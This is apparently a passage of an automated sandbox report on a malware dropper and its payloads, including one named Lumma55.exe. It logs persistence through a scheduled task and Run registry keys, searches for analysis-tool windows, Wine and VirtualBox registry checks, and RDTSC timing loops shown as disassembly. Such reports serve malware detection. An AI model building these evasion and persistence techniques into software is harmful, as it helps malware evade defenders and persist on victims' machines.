Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Window searched: window name: RegmonClass
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e3ce0163b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e3ce0163b.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 80c14d0add.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 80c14d0add.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 67baab2438.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 67baab2438.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3f81b82714.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3f81b82714.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF15D second address: FCF161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF161 second address: FCF187 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF112B4C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007EFF112B4C1Dh 0x00000015 popad 0x00000016 jnl 00007EFF112B4C1Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF187 second address: FCE9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 cld 0x00000007 push dword ptr [ebp+122D1675h] 0x0000000d cmc 0x0000000e call dword ptr [ebp+122D18B0h] 0x00000014 pushad 0x00000015 jmp 00007EFF1080EDDAh 0x0000001a xor eax, eax 0x0000001c jmp 00007EFF1080EDDEh 0x00000021 mov edx, dword ptr [esp+28h] 0x00000025 mov dword ptr [ebp+122D1915h], ebx 0x0000002b sub dword ptr [ebp+122D1915h], ebx 0x00000031 mov dword ptr [ebp+122D372Eh], eax 0x00000037 mov dword ptr [ebp+122D1915h], esi 0x0000003d mov esi, 0000003Ch 0x00000042 pushad 0x00000043 mov bx, ax 0x00000046 mov dword ptr [ebp+122D1915h], edi 0x0000004c popad 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 jmp 00007EFF1080EDDDh 0x00000056 jmp 00007EFF1080EDE2h 0x0000005b lodsw 0x0000005d jmp 00007EFF1080EDDDh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 jno 00007EFF1080EDDDh 0x0000006c pushad 0x0000006d push edi 0x0000006e jmp 00007EFF1080EDE7h 0x00000073 pop ecx 0x00000074 stc 0x00000075 popad 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b js 00007EFF1080EDDCh 0x00000081 mov dword ptr [ebp+122D1BD8h], esi 0x00000087 call 00007EFF1080EDDCh 0x0000008c pop esi 0x0000008d popad 0x0000008e push eax 0x0000008f push ebx 0x00000090 pushad 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1141E99 second address: 1141E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1141E9E second address: 1141EA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1141EA3 second address: 1141EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007EFF112B4C16h 0x0000000c popad 0x0000000d pushad 0x0000000e jnp 00007EFF112B4C16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112D5EA second address: 112D5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFF1080EDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11412FE second address: 1141305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1141305 second address: 114131B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDE0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114173E second address: 1141747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1144D3E second address: 1144D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1144D44 second address: 1144D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1144D48 second address: 1144D6C instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFF1080EDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f je 00007EFF1080EDD6h 0x00000015 jne 00007EFF1080EDD6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jns 00007EFF1080EDD6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1144E88 second address: 1144F01 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007EFF112B4C16h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 5E3544D5h 0x00000013 sub ch, FFFFFFF2h 0x00000016 push 00000003h 0x00000018 mov edi, dword ptr [ebp+122D36BAh] 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 jns 00007EFF112B4C1Ch 0x00000027 pop edi 0x00000028 push 00000003h 0x0000002a mov dword ptr [ebp+122D1951h], esi 0x00000030 push 60775CD8h 0x00000035 jng 00007EFF112B4C1Ah 0x0000003b push ebx 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e pop ebx 0x0000003f add dword ptr [esp], 5F88A328h 0x00000046 xor cx, 4FC8h 0x0000004b lea ebx, dword ptr [ebp+12449C77h] 0x00000051 and di, 4F48h 0x00000056 mov edx, ecx 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007EFF112B4C28h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114510D second address: 1145111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113AD1E second address: 113AD39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113AD39 second address: 113AD55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF1080EDE8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113AD55 second address: 113AD5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164262 second address: 1164276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007EFF1080EDDEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116473C second address: 1164746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164746 second address: 116474A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116474A second address: 116474E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116474E second address: 1164754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164754 second address: 116475A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116475A second address: 116475E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164A29 second address: 1164A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164A2E second address: 1164A52 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFF1080EDEAh 0x00000008 jp 00007EFF1080EDDCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164BD9 second address: 1164BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007EFF112B4C22h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164BF0 second address: 1164C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFF1080EDD6h 0x0000000a jnl 00007EFF1080EDD6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164D67 second address: 1164D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164D6D second address: 1164D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1164D73 second address: 1164D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165031 second address: 1165037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165037 second address: 116503C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116503C second address: 116504C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007EFF1080EDD6h 0x0000000a jnp 00007EFF1080EDD6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116504C second address: 1165050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165374 second address: 116538F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 ja 00007EFF1080EDD6h 0x0000000c je 00007EFF1080EDD6h 0x00000012 popad 0x00000013 js 00007EFF1080EDE2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116538F second address: 1165395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165522 second address: 1165545 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFF1080EDD6h 0x00000008 jmp 00007EFF1080EDE9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165545 second address: 116555D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165F02 second address: 1165F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1165F06 second address: 1165F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007EFF112B4C21h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112F182 second address: 112F188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
